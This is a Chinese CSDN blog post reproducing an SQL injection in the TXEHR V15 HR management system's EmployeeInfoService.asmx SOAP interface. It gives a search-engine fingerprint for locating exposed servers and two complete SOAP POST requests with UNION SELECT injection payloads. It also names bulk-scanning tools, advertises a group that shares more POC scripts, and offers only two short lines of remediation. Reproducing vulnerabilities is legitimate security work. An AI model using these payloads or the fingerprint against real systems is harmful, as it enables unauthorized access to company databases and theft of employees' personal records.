【漏洞复现】同享人力资源管理系统-TXEHR V15 EmployeeInfoService.asmx SQL注入漏洞

于 2024-08-07 15:15:47 发布
阅读量178 收藏 1
点赞数 8
分类专栏: 漏洞复现篇 文章标签: sql 同享人力资源管理系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/140987379
版权

0x01 产品简介

同享人力资源管理系统(TXEHR V15)是一款专为现代企业设计的人力资源管理软件解决方案,旨在通过先进的信息化手段提升企业人力资源管理的效率与水平。该系统集成了组织人事、考勤管理、薪资核算、招聘配置、培训发展、绩效管理等核心模块,并提供了灵活的配置选项和强大的数据分析能力,以满足不同企业规模和行业特性的需求。

0x02 漏洞概述

同享人力资源管理系统-TXEHR V15 EmployeeInfoService.asmx 接口多个实例处SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 搜索引擎

body="/Assistant/Default.aspx"

在这里插入图片描述

0x04 漏洞复现

POC-1

POST /Service/EmployeeInfoService.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/GetEmployeeByCardNo"
 
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetEmployeeByCardNo xmlns="http://tempuri.org/">
      <strCardNo>1' UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--</strCardNo>
    </GetEmployeeByCardNo>
  </soap:Body>
</soap:Envelope>

在这里插入图片描述
sqlmap验证
在这里插入图片描述
POC-2

POST /Service/EmployeeInfoService.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/GetEmployeeByCode"
 
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetEmployeeByCode xmlns="http://tempuri.org/">
      <strCode>1' UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--</strCode>
    </GetEmployeeByCode>
  </soap:Body>
</soap:Envelope>

在这里插入图片描述
sqlmap验证
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限
2、升级至安全版本

SuperherRo
关注
  • 8
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
同享人力资源管理系统-TXEHR V15 EmployeeInfoService.asmx SQL注入漏洞复现
0xSec
08-03 125
同享人力资源管理系统-TXEHR V15 EmployeeInfoService.asmx接口多个实例处SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
同享人力资源管理系统-TXEHR V15 DownloadTemplate 文件读取漏洞复现
0xSec
07-11 516
同享人力资源管理系统-TXEHR V15 DownloadTemplate.asmx 接口处存在文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现同享人力资源管理系统-TXEHR V15 DownloadTemplate 文件读取漏洞
siu~
07-16 419
同享人力资源管理系统-TXEHR V15 DownloadTemplate.asmx 接口处存在文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
同享人力资源管理系统-TXEHR V15 UploadHandler.ashx 任意文件上传漏洞复现
0xSec
08-02 116
同享人力资源管理系统-TXEHR V15 UploadHandler.ashx 接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞复现同享人力资源管理系统-TXEHR V15 UploadHandler.ashx 任意文件上传漏洞
最新发布
siu~
08-07 525
同享人力资源管理系统-TXEHR V15 UploadHandler.ashx 接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
同享TXEHR V15人力管理平台DownloadFile接口任意文件下载漏洞复现 [附POC]
薛定谔嘚喵博客
07-11 158
同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞
漏洞复现同享人力资源管理系统-TXEHR V15 DownloadTemplate 文件读取漏洞
qq_39894062的博客
07-17 426
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
同享TXEHR V15人力管理管理平台strCardNo接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-06 323
同享TXEHR V15人力管理管理平台 strCardNo接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
蓝凌OA wechatLoginHelper.do SQL注入漏洞复现
0xSec
02-27 1371
蓝凌OA wechatLoginHelper.do接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
instantclient-basic-windows.x64-11.2.0.4.0.zip
05-27
Navicat v15连接oracle报错:ORA-28547: connection to server failed, probable Oracle Net admin error; instantclient-basic-windows.x64-11.2.0.4.0.zip; 最少分; 不吃亏; 不上当;
news-commentary-v14.en-zh.tsv
08-26
实战数据 有缺失值,乱码等 数据待清洗处理
BUCK开关电源闭环控制的仿真研究- 28V15V.docx
11-25
3. 闭环系统的设计:设计双极点-双零点补偿网络,提高系统的相位裕度和增益裕度,确保系统稳定性。 4. 闭环系统仿真:在Simulink中建立模型,进行系统仿真,分析在不同工况下的输出电压和负载响应,调整PID参数以...
BUCK开关电源闭环控制的仿真研究- 28V15V.pdf
11-25
通过这项课程设计,学生可以深入理解开关电源的工作原理,掌握PID控制策略在实际系统中的应用,以及如何利用MATLAB进行电力电子系统的仿真分析。这不仅锻炼了学生的理论知识,还提高了他们解决实际问题的能力,为...
BUCK开关电源闭环控制的仿真研究-28V15V.pdf
11-25
BUCK变换器广泛应用于各种电子设备中,如电池管理系统、通信设备、计算机电源等,尤其适合需要高效率、小体积、低电压大电流的场合。 **3.1 课题内容与参数要求** 设计任务包括计算滤波电感L和滤波电容C的参数,...
力扣高频SQL 50题(基础版)第三十八题
m0_70882914的博客
08-02 423
1484.按日期分组销售产品
SQL时间盲注
2301_78549931的博客
08-05 834
在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .如果数据库名的第一个字符的ascii码值等于115,则页面沉睡3秒,如果数据库名的第一个字符的ascii码值不等于115,则页面不沉睡。这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。根据表名知道可能用户的账户和密码是在users表中,接下来我们就是得到该表下的字段名以及内容。
MyBatis 如何通过拦截器修改 SQL
Hello World
08-03 385
假如我们想实现多租户,或者在某些 SQL 后面自动拼接查询条件。在开发过程中大部分场景可能都是一个查询写一个 SQL 去处理,我们如果想修改最终 SQL 可以通过修改各个 mapper.xml 中的 SQL 来处理。但实际过程中我们可能穿插着 ORM 和 SQL 的混合使用,隐藏在代码中不容易被发现,还有假如项目中有很多很多的 SQL 我们不可能一个一个的去修改解决。这个时候我们就需要通过 mybatis 拦截 SQL 并且最终修改 SQL。实现Interceptor接口,并写相关逻辑。
sqllab靶场练习第1~15关
qq_64951792的博客
08-06 754
sqllab第1-15关
u8+v15.x-16.x注册维护工具v2.2
05-12
u8 v15.x-16.x注册维护工具v2.2是用于u8财务软件的注册和维护工具。该工具的主要功能包括:注册u8财务软件、查看u8财务软件的注册信息、备份和恢复u8财务软件的注册信息、卸载u8财务软件等等。 通过u8 v15.x-16.x注册维护工具v2.2,用户可以方便地注册和维护自己的u8财务软件,从而保障软件的正常使用。在注册u8财务软件时,用户可以根据自己的需求选择注册方式(单机或网络),并设置相应的注册信息;在查看注册信息时,用户可以清楚地了解软件的注册状态、注册时间等信息;在备份和恢复注册信息时,用户可以方便地备份和还原自己的注册信息,避免因系统故障等原因造成注册信息的丢失。 此外,u8 v15.x-16.x注册维护工具v2.2还支持卸载u8财务软件,用户可以通过该工具将软件从电脑中彻底卸载,清理系统中的所有残留文件和注册信息,以保证系统的干净和稳定。 总之,u8 v15.x-16.x注册维护工具v2.2是一款易用、实用的u8财务软件注册和维护工具,为用户提供了全面、高效的注册和维护服务,可极大提高用户的使用体验和工作效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值